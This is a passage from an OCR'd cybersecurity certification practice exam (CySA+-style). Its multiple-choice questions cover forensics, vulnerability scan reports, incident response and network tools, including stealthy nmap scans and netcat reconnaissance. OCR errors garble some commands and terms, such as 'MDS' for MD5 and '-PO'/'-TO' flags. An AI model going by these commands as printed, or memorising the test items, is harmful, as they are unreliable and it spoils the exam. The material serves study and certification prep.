C. There are no TCP services reachable on nmap’s default 1000 TCP ports. 

D. There are no TCP services reachable on nmap’s default 65535 TCP ports. 


What is the purpose of creating an MDS hash for a drive during the forensic imaging process? 
A. To prove that the drive’s contents were not altered 

B. To prove that no data was deleted from the drive 

C. To prove that no files were placed on the drive 

D. All of the above 


After completing his unsuccessful forensic analysis of the hard drive from a workstation 
that was compromised by malware, Ben sends it to be re-imaged and patched by his com- 
pany’s desktop support team. Shortly after the system returns to service, the device once 
again connects to the same botnet. What action should Ben take as part of his next forensic 
review if this is the only system showing symptoms like this? 


A. Verify that all patches are installed. 

B. Destroy the system. 

C. Validate the BIOS hash against a known good version. 
D. Check for a system with a duplicate MAC address. 
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27. 


28. 


29. 


30. 
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Part of the forensic data that Susan was provided for her investigation was a Wireshark 
packet capture. The investigation is aimed at determining what type of media an employee 
was consuming during work. What is the more detailed analysis that Susan can do if she is 
provided with the data shown here? 








eO0OAmM A BOXCA? ST PS ooon @wsex o 





Filter: | tcp.stream eq 2 v | Expression... Clear Apply Save 
No. Time Source Destination Protocol Lengtt Info 
304 14.190515 137 .30.120.37 137 .30.123.234 1514 [TCP segment of a reassembled PDU] 
305 14.190738 137.30.123.234 137.30.120.37 TCP 54 submitserver > http [ACK] Seq=705 Ack=79467 Win=64240 Len=0 
306 14.191695 137.30.120.37 137.30.123.234 TCP 1514 [TCP segment of a reassembled PDU] 
307 14.194417 137.30.120.37 137.30. 123.234 TCP 1514 [TCP segment of a reassembled PDU] 
308 14.194649 137.30.123.234 137.30.120.37 TER 54 submitserver > http [ACK] Seq=705 Ack=82387 Win=64240 Len=0 
309 14.195589 137.30.120.37 137.30.123.234 TCP 1514 [TCP segment of a reassembled PDU] 
310 14.197053 137.30.120.37 137.30. 123.234 TCP 1514 [TCP segment of a reassembled PDU] 
311 14.197244 137.30.123.234 137.30.120.37 TCP 54 submitserver > http [ACK] Seq=705 Ack=85307 Win=64240 Len=0 
312 14.197534 137.30.120.37 137.30.123.234 HTTP 675 HTTP/1.1 200 OK (GIF89a) 
313 14.318083 137.30.123.234 137.30.120.37 TCP 54 submitserver > http [ACK] Seq=705 Ack=85928 Win=63619 Len=0 
320 23.394385 137.30.123.234 137.30.120.37 TCP 54 submitserver > http [FIN, ACK] Seq=705 Ack=85928 Win=63619 Len=0 
323 23.395031 137.30.120.37 137.30.123.234 TCP 60 http > submitserver [ACK] Seq=85928 Ack=706 Win=49206 Len=0 
326 23.395760 137.30.120.37 137.30.123.234 TCP 60 http > submitserver [FIN, ACK] Seq=85928 Ack=706 Win=49206 Len=0 
327 23.395790 137.30.123.234 137.30.120.37 TCP 54 submitserver > http [ACK] Seq=706 Ack=85929 Win=63619 Len=0 


She can determine that the user was viewing a GIF. 
She can manually review the TCP stream to see what data was sent. 


She can export and view the GIF. 
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She cannot determine what media was accessed using this data set. 


Which one of the following is not a characteristic of an information systems security audit? 
A. Conducted on behalf of a third party 

B. Result in a formal statement 

C. Use informal interviews rather than rigorous, formal testing 

D. May be conducted by internal groups 

Mark is a cybersecurity analyst for a large company but is helping a nonprofit organization 


in his free time. He would like to begin a vulnerability scanning program for that company 
but does not have any funds available to purchase a tool. What open source tool can he use? 


A. Qualys 
B. Nessus 
C. Nexpose 
D. Openvas 


Mika wants to run an nmap scan that includes all TCP ports and uses service detection. 
Which of the following nmap commands should she execute? 


A. nmap -p0 -all -SC 

B. nmap -p 1-32768 -sVS 

C. nmap -p 1-65535 -sV -sS 
D. nmap -all -sVS 
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31. Which of the following is not classified as an eradication by CompTIA? 
A. Patching 
B. Sanitization 
C. Reconstruction 


D. Secure disposal 


32. Dan is a cybersecurity analyst for a healthcare organization. He ran a vulnerability scan of 
the VPN server used by his organization. His scan ran from inside the data center against a 
VPN server also located in the data center. The complete vulnerability report is shown here. 
What action should Dan take next? 


v 172.19.cemm (MSVpNn-cEemeE, -) = 


wv Vulnerabilities (1) HE 


vE 1 Non-Zero Padding Bytes Observed in Ethernet Packets CVSS: - CVSS3:- Active 
First Detected: 07/16/2014 at 20:06:22 (GMT-0400) Last Detected: 04/05/2017 at 01:06:21 (GMT-0400) Times Detected: 33 Last Fixed: 
01/07/2015 at 21:03:15 (GMT-0400) oW 
QID: 82048 CVSS Base: CVSS Temporal: 0 
Category: TCP/IP CVSS3 Base: ğ 
CVE ID: - CVSS3 Temporal: 
Vendor Reference - CVSS Environment: 
Bugtraq ID: - Asset Group: 
Service Modified: 05/26/2009 Collateral Damage Potential: 
User Modified: - Target Distribution: 
Edited: No Confidentiality Requirement: 
PCI Vuln: No Integrity Requirement: 
Ticket State: Availability Requirement: 
THREAT: 


Ethernet standards impose strict limitations on the size of encapsulated packets, requiring small packets to be padded up to a minimum size using zero padding bytes (for example, 0x00). 
The service detected that the small packets from the host were padded to the mimimum size using non-zero padding bytes, as shown in the Results section. 


IMPACT: 
This weakness may be exploited to fingerprint the Ethemet cards and device drivers. 


SOLUTION: 
Contact the vendor of the Ethernet cards and device drivers for the availability of a patch. 


EXPLOITABILITY: 

There is no exploitability information for this vulnerability. 

Dan should immediately remediate this vulnerability. 

Dan should schedule the vulnerability for remediation within the next 30 days. 


Dan should rerun the scan because this is likely a false positive report. 
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Dan should take no action. 


33. Gina is testing a firewall ruleset for use on her organization’s new CheckPoint firewall. She 
would like the firewall to allow unrestricted web browsing for users on the internal net- 
work, with the exception of sites listed on a Blocked Hosts list that the cybersecurity team 
maintains. She designed the ruleset shown here. What, if any, error does it contain? 


Source Destination Destination 
Network Network Ports 


Blocked Hosts | 80, 443 





A. Promiscuous rule 


B. Orphaned rule 
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C. Shadowed rule 


D. The rule base does not contain an error. 


34. Jay received an alert from his organization’s SIEM that it detected a potential attack against a 
web server on his network. However, he is unsure whether the traffic generating the alert actu- 
ally entered the network from an external source or whether it came from inside the network. 
The NAT policy at the network perimeter firewall rewrites public IP addresses, making it diffi- 
cult to assess this information based upon IP addresses. Jay would like to perform a manual log 
review to locate the source of the traffic. Where should he turn for the best information? 


A. Application server logs 
B. Database server logs 
C. Firewall logs 


D. Antimalware logs 


35. Jim ran a traceroute command to discover the network path between his system and the 
CompTIA website. He received the results shown here. What can he conclude from these results? 


~$ traceroute www.comptia.org 

traceroute to www.comptia.org (198.134.5.6), 30 hops max, 60 byte packets 

216.182.225.74 (216.182.225.74) 13.619 ms 216.182.226.92 (216.182.226.92) 19.493 ms 216.182.226.80 (216.182.226.808) 16.713 ms 
100.66.8.8 (100.66.8.8) 17.456 ms 100.66.9.220 (100.66.9.220) 12.102 ms 100.66.9.216 (100.66.9.216) 16.374 ms 

100.66.15.82 (100.66.15.82) 16.938 ms 100.66.10.136 (100.66.10.136) 19.499 ms 100.66.14.40 (100.66.14.40) 12.238 ms 
100.66.6.169 (100.66.6.169) 21.560 ms 100.66.7.99 (100.66.7.99) 12.254 ms 100.66.6.113 (100.66.6.113) 16.032 ms 

100.66.4.87 (100.66.4.87) 21.326 ms 100.66.4.159 (100.66.4.159) 21.698 ms 100.66.4.55 (100.66.4.55) 21.433 ms 

100.65.8.1 (100.65.8.1) 0.800 ms 100.65.11.161 (100.65.11.161) 0.347 ms 100.65.8.225 (100.65.8.225) 0.382 ms 

52.93.24.76 (52.93.24.76) 17.369 ms 205.251.245.253 (205.251.245.253) 1.269 ms 205.251.244.206 (205.251.244.206) 0.776 ms 
54.239.109.46 (54.239.109.46) 2.318 ms 52.93.24.95 (52.93.24.95) 0.726 ms 54.239.111.96 (54.239.111.96) 5.132 ms 
54.239.111.102 (54.239.111.102) 25.935 ms 54.239.108.81 (54.239.108.81) 0.984 ms 54.239.109.250 (54.239.109.250) 19.773 ms 

* * 54.239.109.63 (54.239.109.63) 1.363 ms 

* * 52.95.62.30 (52.95.62.30) 25.338 ms 

52.95.62.142 (52.95.62.142) 26.541 ms 52.95.62.57 (52.95.62.57) 19.524 ms 52.95.62.76 (52.95.62.76) 26.906 ms 

52.95.62.73 (52.95.62.73) 19.577 ms 52.95.62.57 (52.95.62.57) 19.699 ms 52.95.216.121 (52.95.216.121) 19.690 ms 

vb2000d2. rar3.chicago-il.us.xo.net (207.88.13.6) 20.363 ms 52.95.216.121 (52.95.216.121) 19.125 ms 

vb2000d2. rar3.chicago-il.us.xo.net (207.88.13.6) 19.776 ms 

15 vb2000d2.rar3.chicago-il.us.xo.net (207.88.13.6) 19.740 ms 20.469 ms 216.156.16.199.ptr.us.xo.net (216.156.16.199) 20.207 ms 
16 216.55.11.62 (216.55.11.62) 21.566 ms 21.408 ms 21.488 ms 


bA ped ped jd pd 
UNP OOONOVA WNE 


17 * * 216.55.11.62 (216.55.11.62) 21.498 ms 
18 *** 
19 ** * 
20 «* * 
21 kkk 
22 ** * 
23 ** * 
24 * * * 
25 * * * 
26 * * * 
27 ** * 
28 *«* * 
29 ** * 
30 * * * 
~$ [i 


A. The CompTIA website is located in Chicago. 
B. The CompTIA website is down. 


C. The closest network device to the CompTIA site that Jim can identify is 
216.182.225.774. 


D. The closest network device to the CompTIA site that Jim can identify is 216.55.11.62. 
36. Which one of the following types of vulnerability scans would provide the least information 

about the security configuration of a system? 

A. Agent-based scan 

B. Credentialed scan 

C. Uncredentialed internal scan 

D 


Uncredentialed external scan 


37. 


38. 


39. 


40. 
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After finishing a forensic case, Sam needs to wipe the media that he is using to prepare it 
for the next case. Which of the following methods is best suited to preparing the hard drive 
that he will use if he wants to be in compliance with NIST SP 800-88? 


A. Degauss the drive. 
B. Zero write the drive. 


C. Seven rounds: all ones, all zeros, and five rounds of random values 
D. Use the ATA Secure Erase command. 


After reading the NIST standards for incident response, Chris spends time configuring the 
NTP service on each of his servers, workstations, and appliances throughout his network. 
What phase of the incident response process is he working to improve? 


A. Preparation 

B. Detection and analysis 

C. Containment, eradication, and recovery 

D. Post-incident activity 

Susan is the ISO for her company and is notified that a zero-day exploit has been released 
that can result in remote code execution on all Windows 10 workstations on her network 
because of an attack against Windows domain services. She wants to limit her exposure to 


this exploit but needs the systems to continue to be able to access the Internet. Which of the 
following approaches is best for her response? 


A. Firewalling 
B. Patching 

C. Isolation 

D. Segmentation 


Fred has configured SNMP to gather information from his network devices and issues the 
following command: 


$ snmpgetnext -v 1 -c public devicel \ 

He receives a response that includes the following data: 
ip.ipRouteTable.ipRouteEntry.ipRouteDest \ 

ip.ipRouteTable. ipRouteEntry.ipRouteNextHop 
ip.ipRouteTable.ipRouteEntry.ipRouteDest.0.0.0.0 = IpAddress: 0.0.0.0 
ip.ipRouteTable.ipRouteEntry.ipRouteNextHop.0.0.0.0 = IpAddress: 10.0.11.1 
What local command could he have executed to gather the same information? 
A. traceroute 

B. route add default gw 10.0.11.1 

C. netstat -nr 

D. pine -r 10.0.11.1 


264 Chapter 5 = Practice Exam 1 


41. After scanning a network device located in her organization’s data center, Shannon noted 
the vulnerability shown here. What is the minimum version level of SNMP that Shannon 
should be running? 


w Vulnerabilities (21) g 


v BM 5 EOL/Obsolete Software: SNMP Version Detected CVSS: - CVSS3: - Active ($v) 
First Detected: 02/04/2017 at 22:15:28 (GMT-0400) Last Detected: 04/05/2017 at 03:01:18 (GMT-0400) Times Detected: 3 Last Fixed: N/A 
QID: 105459 CVSS Base: 6.4 
Category: Security Policy CVSS Temporal: 5.4 
CVE ID: - CVSS3 Base: ° 
Vendor Reference - CVSS3 Temporal: 

Bugtraq ID: - CVSS Environment: 

Service Modified: 03/10/2017 Asset Group: 

User Modified: ° Collateral Damage Potential: 
Edited: No Target Distribution: 

PCI Vuln: Yes Confidentiality Requirement: 
Ticket State: Open Integrity Requirement: 


Availability Requirement: 


A. 1.1 
B. 1.2 
C. 2 
D. 3 


42. When Frank was called in to help with an incident recovery effort, he discovered that the 
network administrator had configured the network as shown here. What type of incident 
response action best describes what Frank has encountered? 


Firewall 
Ruleset: 
Deny all from 
outside in 

Deny all from 
inside out 










Border Router 


— 7 
g- n 





Data Center 
VLANs 











A 
Containment 
VLAN 






B 
Business Office 


A. Segmentation 

B. Isolation 

C. Removal 

D. Network locking 


43. 


44. 


45. 


46. 
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As part of the forensic investigation of a Linux workstation, Alex needs to determine what 
commands may have been issued on the system. If no anti-forensic activities have taken place, 
what is the best location for Alex to check for a history of commands issued on the system? 


A. /var/log/commands. log 

B. SHOME/.bash_history 

C. SHOME/.commands.sqlite 

D. /var/log/authactions. log 

Ben is preparing to reuse media that contained data that his organization classifies as 


“moderate” value. If he wants to follow NIST SP-800-88’s guidelines, what should he do to 
the media if the media will not leave his organization’s control? 


A. Reformat it. 
B. Clear it. 

C. Purge it. 

D. Destroy it. 


Crystal is attempting to determine the next task that she should take on from a list of secu- 
rity priorities. Her boss told her that she should focus on activities that have the most “bang 
for the buck.” Of the tasks shown here, which should she tackle first? 


Security Issue (Criticality | Time Required to Fix 
1. Missing database security patch 
2. Remote code execution vulnerability in public-facing server 


3. Missing operating system security patch 
4. Respond to compliance report 





A. Task 1 
B. Task 2 
C. Task 3 
D. Task 4 


During the analysis of an incident that took place on her network, Tammy discovered that 
the attacker used a stolen cookie to access a web application. Which one of the following 
attack types most likely occurred? 


A. Man-in-the-middle 
B. Privilege escalation 
C. Cross-site scripting 
D 


Session hijacking 
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When Pete connects to his organization’s network, his PC runs the NAC software his systems 
administrator installed. The software communicates to the edge switch he is plugged into, 
which validates his login and system security state. What type of NAC solution is Pete using? 


A. Agent based, in-band 

B. Agentless, in-band 

C. Agent based, out-of-band 

D. Agentless, out-of-band 

Curt is conducting a forensic analysis of a Windows system and needs to determine whether 


a program was set to automatically run. Which of the following locations should he check 
for this information? 


A. NTFS INDX files 
B. The registry 

C. Event logs 

D. Prefetch files 


During a security assessment, Scott discovers that his organization has implemented a mul- 
tifactor authentication requirement for systems that store and handle highly sensitive data. 

The system requires that users provide both a password and a four-digit PIN. What should 
Scott note in his findings about this system? 


A. The multifactor system provides two independent factors and provides an effective 
security control. 


B. The factors used are both the same type of factor, making the control less effective. 


C. The system uses only two factors and is not a true multifactor system. To qualify as 
multifactor, it should include at least three factors. 


D. The multifactor system’s use of a PIN does not provide sufficient complexity, and addi- 
tional length should be required for any PIN for secure environments. 

What concept measures how easy data is to lose? 

A. Order of volatility 

B. Data transience 

C. Data loss prediction 

D. The Volatility Framework 


During a reconnaissance exercise, Mika uses the following command: 
root@demo:~# nc -v 10.0.2.9 8080 

www.example.com [10.0.2.9] 8080 (http-alt) open 

GET / HTTP/1.0 

What is she doing? 

A. Checking for the HTTP server version using netcat 

B. Creating a reverse shell using netcar 

C. HTTP banner grabbing using netcat 
D 


Executing an HTTP keep-alive using netcar 
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52. Steps like those listed here are an example of what type of incident response preparation? 


1. Visit https: //otx.alienvault.com and the suspected C&C system’s IP address on the 
top search input field. 


2. If the IP address is associated with malware C&C activity, create a ticket in the incident 
response tracking system. 


A. Creating a CSIRT 

B. Creating a playbook 

C. Creating an incident response plan 
D. Creating an IR-FAQ 


53. While analyzing the vulnerability scan from her web server, Kristen discovers the issue 
shown here. Which one of the following solutions would best remedy the situation? 


v Be 3 SSL/TLS Server supports TLSv1.0 port 3389/tcp over SSL CVSS: - CVSS3:- Active [d~] 
First Detected: 07/17/2016 at 01:17:31 (GMT-0400) Last Detected: 04/09/2017 at 01:29:32 (GMT-0400) Times Detected: 20 Last Fixed: 
N/A 2.64) 

QID: 38628 CVSS Base: CVSS Temporal: 2.3 
Category: General remote services CVSS3 Base: oW 
CVE ID: - CVSS3 Temporal: 0 
Vendor Reference - CVSS Environment: 

Bugtraq ID: - Asset Group: 

Service Modified: 07/14/2016 Collateral Damage Potential: 

User Modified: - Target Distribution: 

Edited: No Confidentiality Requirement: 

PCI Vuln: No Integrity Requirement: 

Ticket State: Availability Requirement: 

A. Move from TLS 1.0 to SSL 3.0. 

B. Require IPsec connections to the server. 

C. Disable the use of TLS. 

D. Move from TLS 1.0 to TLS 1.2. 


54. Charles is building an incident response playbook for his organization that will address 
command and control client-server traffic detection and response. Which of the following 
information sources is least likely to be part of his playbook? 


A. DNS query logs 

B. Threat intelligence feeds 

C. Honeypot data 

D. Notifications from internal staff about suspicious behavior 


55. Which one of the following mechanisms may be used to enhance security in a context- 
based authentication system? 


A. Time of day 

B. Location 

C. Device fingerprint 
D. All of the above 
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Susan’s organization has faced a significant increase in successful phishing attacks, result- 
ing in compromised accounts. She knows that she needs to implement additional technical 
controls to prevent successful attacks. Which of the following controls will be the most 
effective while remaining relatively simple and inexpensive to deploy? 


A. Increased password complexity requirements 

B. Application or token-based multifactor authentication 

C. Biometric-based multifactor authentication 

D. OdAuth-based single sign-on 

Carol recently fell victim to a phishing attack. When she clicked the link in an email mes- 
sage that she received, she was sent to her organization’s central authentication service and 
logged in successfully. She did verify the URL and certificate to validate that the authentica- 
tion server was genuine. After authenticating, she was sent to a form that collected sensi- 


tive personal information that was sent to an attacker. What type of vulnerability did the 
attacker most likely exploit? 


A. Buffer overflow 

B. Session hijacking 

C. IP spoofing 

D. Open redirect 

As a penetration tester, Max uses Wireshark to capture all of his testing traffic. Which of 
the following is not a reason that Max would capture packets during penetration tests? 

A. To document the penetration test 

B. To scan for vulnerabilities 

C. To gather additional information about systems and services 

D. To troubleshoot issues encountered when connecting to targets 

Rich recently configured new vulnerability scans for his organization’s business intelligence 
systems. The scans run late at night when users are not present. Rich received complaints 
from the business intelligence team that the performance burden imposed by the scanning is 


causing their overnight ETL jobs to run too slowly and they are not completing before 
business hours. How should Rich handle this situation? 


A. Rich should inform the team that they need to run the ETL jobs on a different schedule. 
B. Rich should reconfigure the scans to run during business hours. 


C. Rich should inform the team that they must resize the hardware to accommodate both 
requirements. 


D. Rich should work with the team to find a mutually acceptable solution. 


Which one of the following regulations imposes compliance obligations specifically only 
upon financial institutions? 


A. SOX 

B. HIPAA 
C. PCI DSS 
D. GLBA 
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Bryce ran a vulnerability scan on his organization’s wireless network and discovered that 
many employees are bringing their personally owned devices onto the corporate network 
(with permission) and those devices sometimes contain serious vulnerabilities. What mobile 
strategy is Bryce’s organization using? 


A. COPE 
B. SAFE 
C. BYOD 


D. None of the above 


Richard uses the following command to mount a forensic image. What has he specified in 
his command? 


sansforensics@siftworkstation:~/Casel$ sudo mount RHINOUSB.dd /mnt/usb 
-t auto -o loop, noexec,ro 


A. He has mounted the file automatically, and it will not use any autorun files contained 
in the image. 


B. He has mounted the file with the filesystem type set to auto recognize and has set the 
mount to act as a read-only loop device that will not execute files. 


C. He has mounted the file automatically and has set the mount to act as a read-only loop 
device that will not execute files. 


D. He has mounted the file with the filesystem type set to auto recognize and has set it to 
act as a remote-only loop device that will not execute files. 


Javier ran a vulnerability scan of a new web application created by developers on his team 
and received the report shown here. The developers inspected their code carefully and do 
not believe that the issue exists. They do have a strong understanding of SQL injection 
issues and have corrected similar vulnerabilities in other applications. What is the most 
likely scenario in this case? 


OEE CGI Generic SQL Injection (blind, time based) 


Description 


By sending specially crafted parameters to one or more CGI scripts hosted on the remote web server, Nessus was able to get a slower response, which 
suggests that it may have been able to modify the behavior of the application and directly access the underlying database. 


An attacker may be able to exploit this issue to bypass authentication, read confidential data, modify the remote database, or even take control of the 
remote operating system. 
A. Javier misconfigured the scan. 
B. The code is deficient and requires correction. 
C. The vulnerability is in a different web application running on the same server. 
D 


The result is a false positive. 
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Chris is able to break into a host in a secured segment of a network during a penetration 
test. Unfortunately, the rules of engagement state that he is not allowed to install additional 
software on systems he manages to compromise. How can he use netcat to perform a port 
scan of other systems in the secured network segment? 


A. Hecan use the -sS option to perform a SYN scan. 

B. Hecan use the -z option to perform a scan. 

C. Hecan use the -s option to perform a scan. 

D. He can’t; netcat is not a port scanner. 

Catherine is working with the architect on the design of a new data center for her organiza- 


tion. She is concerned about the intrusion alarms that will notify security personnel of an 
attempted break-in to the facility. What type of control is Catherine designing? 


A. Logical 

B. Compensating 
C. Administrative 
D. Physical 


In his role as a security manager, Fred and a small team of experts have prepared a scenario 
for his security and system administration teams to use during their annual security testing. 
His scenario includes the rules that both the defenders and attackers must follow, as well 

as a scoring rubric that he will use to determine which team wins the exercise. What term 
should Fred use to describe his team’s role in the exercise? 


A. White team 
B. Red team 
C. Gold team 
D. Blue team 


Lauren downloads a new security tool and checks its MD5. What does she know about the 
software she downloaded if she receives the following message: 


root@demo:~# md5sum -c demo.md5 

demo.txt: FAILED 

md5sum: WARNING: 1 computed checksum did not match 
A. The file is corrupt. 

B. Attackers have modified the file. 

C. The files do not match. 
D. 


The test failed and provided no answer. 


Chapter 5 = Practice Exam 1 271 


68. Martha ran a vulnerability scan against a series of endpoints on her network and received 
the vulnerability report shown here. She investigated further and found that several end- 
points are running Internet Explorer 7. What is the minimum version level of IE that is 
considered secure? 


69. 


70. 


A. 
B. 
C 
D 


v BME 5 Microsoft Internet Explorer Cumulative Security Update (MS12-023) 


First Detected: 02/05/2017 at 03:55:55 (GMT-0400) Last Detected: 04/05/2017 at 00:03:46 (GMT-0400) 

QID: 100113 CVSS Base: 9.3 

Category: Internet Explorer CVSS Temporal: 6.9 

CVE ID: CVE-2012-0168 CVE-2012-0169 CVE- CVSS3 Base: - 
2012-0170 CVE-2012-0171 CVE-2012- CVSS3 Temporal: - 
0172 CVSS Environment: 

Vendor Reference MS1i2-023 Asset Group: - 

Bugtraq ID: 52902 Collateral Damage Potential: - 

Service Modified: 11/04/2015 Target Distribution: - 

User Modified: - Confidentiality Requirement: 

Edited: No Integrity Requirement: - 

PCI Vuln: Yes Availability Requirement: - 

Ticket State: Open 

THREAT: 


Microsoft Internet Explorer is a Web browser available for Microsoft Windows. 

Internet Explorer is prone to multiple vulnerabilities that could allow remote code execution. 

Microsoft has released a security update that addresses the vulnerabilities by modifying the way Intemet 
Explorer handles the printing of specially crafted HTML content and the way 

Internet Explorer handles objects in memory. 

This security update is rated Critical for Internet Explorer 6, Internet Explorer 7, Internet Explorer 8 and Internet 
Explorer 9 on Windows clients and Moderate for Internet Explorer 6, Intemet 

Explorer 7, Internet Explorer 8 and Internet Explorer 9 on Windows servers. 

Note: Previously this was an iDefense exclusive vulnerability with iDefense ID: 684425. 

Windows Embedded Systems:- For additional information regarding security updates for embedded systems, refer to 
the following MSDN blog(s): 

April 2012 Security Updates are Live on ECE for XPe and Standard 2009 (KB2675157) 


9 
11 


No version of Internet Explorer is considered secure. 


During an incident investigation, Chris is able to identify the IP address of the system that 
was used to compromise multiple systems belonging to his company. What can Chris deter- 
mine from this information? 


A. 
B. 
C. 
D. 


The identity of the attacker 
The country of origin of the attacker 
The attacker’s domain name 


None of the above 


Nick believes that an attacker has compromised a Linux workstation on his network and has 
added a new user. Unfortunately, most logging was not enabled on the system. Which of the fol- 
lowing is most likely to provide useful information about which user was created most recently? 


A. 


B. 
C. 
D 


/etc/passwd 
/var/log/auth. log 
Run ls -ld /home/$username for each user on the system 


Run ls -l /home/Susername/.bash_logout to see the most recent logout time for 
each user on the system 
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After a major compromise involving what appears to be an APT, Jaime needs to conduct 
a forensic examination of the compromised systems. Which containment method should 
he recommend to ensure that he can fully investigate the systems that were involved while 
minimizing the risk to his organization’s other production systems? 


A. 
B. 
C. 
D. 


Sandboxing 
Removal 
Isolation 


Segmentation 


Michelle is attempting to remediate a security vulnerability and must apply a patch to a 
production database server. The database administration team is concerned that the patch 
will disrupt business operations. How should Michelle proceed? 


A. 
B. 


Michelle should deploy the patch immediately on the production system. 


Michelle should wait 60 days to deploy the patch to determine whether bugs are 
reported. 


Michelle should deploy the patch in a sandbox environment to test it prior to applying 
it in production. 


Michelle should contact the vendor to determine a safe timeframe for deploying the 
patch in production. 


Kent ran a vulnerability scan of an internal CRM server that is routinely used by employees, 
and the scan reported that no services were accessible on the server. Employees continued to 
use the CRM application over the web without difficulty during the scan. What is the most 
likely source of Kent’s result? 


A. 
B. 
C. 
D. 


The server requires strong authentication. 
The server uses encryption. 
The scan was run from a different network perspective than user traffic. 


The scanner’s default settings do not check the ports used by the CRM application. 


Steve needs to perform an nmap scan of a remote network and wants to be as stealthy as 
possible. Which of the following nmap commands will provide the stealthiest approach to 


his scan? 

A. nmap -PO -sT 10.0.10.0/24 

B. nmap -sT -TO 10.0.10.0/24 

C. nmap -PO -sS 10.0.10.0/24 

D. nmap -PO -sS -TO 10.0.10.0/24 


Which element of the COBIT framework contains the high-level requirements that an orga- 
nization should implement to manage its information technology functions? 


A. 


B. 
C. 
D 


Framework 
Process descriptions 
Control objectives 


Maturity models 
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Jenna is configuring the scanning frequency for her organization’s vulnerability scanning 
program. Which one of the following is the least important criteria for Jenna to consider? 


A. Sensitivity of information stored on systems 

B. Criticality of the business processes handled by systems 

C. Operating system installed on systems 

D. Exposure of the system to external networks 

Donna is interpreting a vulnerability scan from her organization’s network, shown here. 
She would like to determine which vulnerability to remediate first. Donna would like to 
focus on the most critical vulnerability according to the potential impact if exploited. 


Assuming the firewall is properly configured, which one of the following vulnerabilities 
should Donna give the highest priority? 


Internet 





\ j File Server 





Email Server Web Server 


Severity 5 vulnerability in the file server 
Severity 3 vulnerability in the file server 


Severity 4 vulnerability in the web server 
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Severity 2 vulnerability in the mail server 

Which one of the following document categories provides the highest-level authority for an 
organization’s cybersecurity program? 

A. Policy 

B. Standard 

C. Procedure 
D 


Framework 
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Chris is planning a vulnerability scanning program for his organization and is scheduling 
weekly scans of all the servers in his environment. He was approached by a group of system 
administrators who asked that they be given direct access to the scan reports without going 
through the security team. How should Chris respond? 


A. Chris should provide the administrators with access. 


B. Chris should deny the administrators access because the information may reveal criti- 
cal security issues. 


C. Chris should offer to provide the administrators with copies of the report after they go 
through a security review. 


D. Chris should deny the administrators access because it would allow them to correct 
security issues before they are analyzed by the security team. 


During an incident investigation, Chris discovers that attackers were able to query informa- 
tion about his routers and switches using SNMP. In addition, he discovers that the SNMP 
traffic was sent in plain text through his organization’s network management backend 
network. Which version of SNMP would provide encryption and authentication features to 
help him prevent this in the future? 


A. SNMP v1 
B. SNMP v2 
C. SNMP v3 
D. SNMP v4 


Which one of the following statements is true about virtualized operating systems? 
A. In bare-metal virtualization, all guest operating systems must be the same version. 


B. In bare-metal virtualization, all guest operating systems must be the same platform 
(e.g., Windows, Red Hat, CentOS). 


C. In bare-metal virtualization, the host operating system and guest operating system 
platforms must be consistent. 


D. None of these is correct. 
While reviewing a report from a vulnerability scan of a web server, Paul encountered the 


vulnerability shown here. What is the easiest way for Paul to correct this vulnerability with 
minimal impact on the business? 


v EEE 3 Listing of Scripts in cgi-bin Directory port 80/tcp CVSS: - CVSS3:- New ($7) 
First Detected: 04/09/2017 at 03:18:23 (GMT-0400) Last Detected: 04/09/2017 at 03:18:23 (GMT-0400) Times Detected: 1 Last Fixed: 
N/A 5 
QID: 86044 CVSS Base: CVSS Temporal: 4.8 
Category: Web server CVSS3 Base: ` 
CVE ID: - CVSS3 Temporal: 

Vendor Reference CVSS Environment: 

Bugtraq ID: - Asset Group: 

Service Modified: 04/28/2009 Collateral Damage Potential: 
User Modified: 5 Target Distribution: 

Edited: No Confidentiality Requirement: 
PCI Vuln: Yes Integrity Requirement: 
Ticket State: Availability Requirement: 
THREAT: 


CGI scripts are usually placed in the cgi-bin Web directory. Listing of files in your cgi-bin directory is allowed. 


IMPACT: 
By browsing the cgi-bin directory, unauthorized users can obtain a list of all CGI scripts present on your server. With this information, they can implement further attacks on 
vulnerable CGI scripts. 
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Block ports 80 and 443. 
Adjust directory permissions. 
Block port 80 only to require the use of encryption. 


Remove CGI from the server. 


A log showing a successful user authentication is classified as what type of occurrence in 
NIST?’s definitions? 


A. 
B. 
C. 
D. 


A security incident 
A security event 
An event 


An adverse event 


Sally used the dig command to attempt to look up the IP address for CompTJA’s website 
and received the results shown here. What can Sally conclude from these results? 
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~$ dig comptia.org +showsearch 


; <<>> DiG 9.8.2rci—RedHat-9.8.2-0.62.rc1.55.amzn1 <<>> comptia.org +showsearch 
;; global options: +cmd 

;; Got answer: 

;; —>>HEADER<<- opcode: QUERY, status: NOERROR, id: 49127 

;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: ®, ADDITIONAL: 0 


;; QUESTION SECTION: 
;comptia.org. IN A 


;; ANSWER SECTION: 
comptia.org. 34 IN A 198.134.5.6 


;; Query time: ® msec 

;; SERVER: 172.30.0.2#53(172. 30.0.2) 

;; WHEN: Tue Jun 13 09:35:01 2017 

>> MSG SIZE rcvd: 45 
CompTIA’s website is located at 198.134.5.6. 
CompTIA’s website is located at 172.30.0.2. 
CompTIA’s website is currently down. 


The DNS search failed, but you cannot draw any conclusions about the website. 


Fran is trying to run a vulnerability scan of a web server from an external network, and the 
scanner is reporting that there are no services running on the web server. She verified the 
scan configuration and attempted to access the website running on that server using a web 
browser on a computer located on the same external network and experienced no difficulty. 
What is the most likely issue with the scan? 


A. 


B. 
C. 
D 


A host firewall is blocking access to the server. 
A network firewall is blocking access to the server. 
An intrusion prevention system is blocking access to the server. 


Fran is scanning the wrong IP address. 
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Ty is reviewing the scan report for a Windows system joined to his organization’s domain 
and finds the vulnerability shown here. What should be Ty’s most significant concern 


related to this vulnerability? 


v Be 3 Administrator Account's Password Does Not Expire 


First Detected: 08/04/2015 at 18:02:25 (GMT-0400) 


QID: 90080 
Category: Windows 
CVE ID: - 
Vendor Reference 

Bugtraq ID: 


Service Modified: 08/03/2015 
User Modified: 


Edited: No 
PCI Vuln: Yes 
Ticket State: 

THREAT: 


Last Detected: 04/05/2017 at 00:48:55 (GMT-0400) 


CVSS Base: 7.5) 
CVSS Temporal: 7.1 
CVSS3 Base: - 
CVSS3 Temporal: 
CVSS Environment: 

Asset Group: 

Collateral Damage Potential: 

Target Distribution: 

Confidentiality Requirement: 

Integrity Requirement: 

Availability Requirement: 


Times Detected: 22 Last Fixed: 


The scanner probed the Security & Accounts Database (SAM) and found that the target Windows box's Administrator account has a password that does not expire. 


A. The presence of this vulnerability indicates that an attacker may have compromised his 


network. 


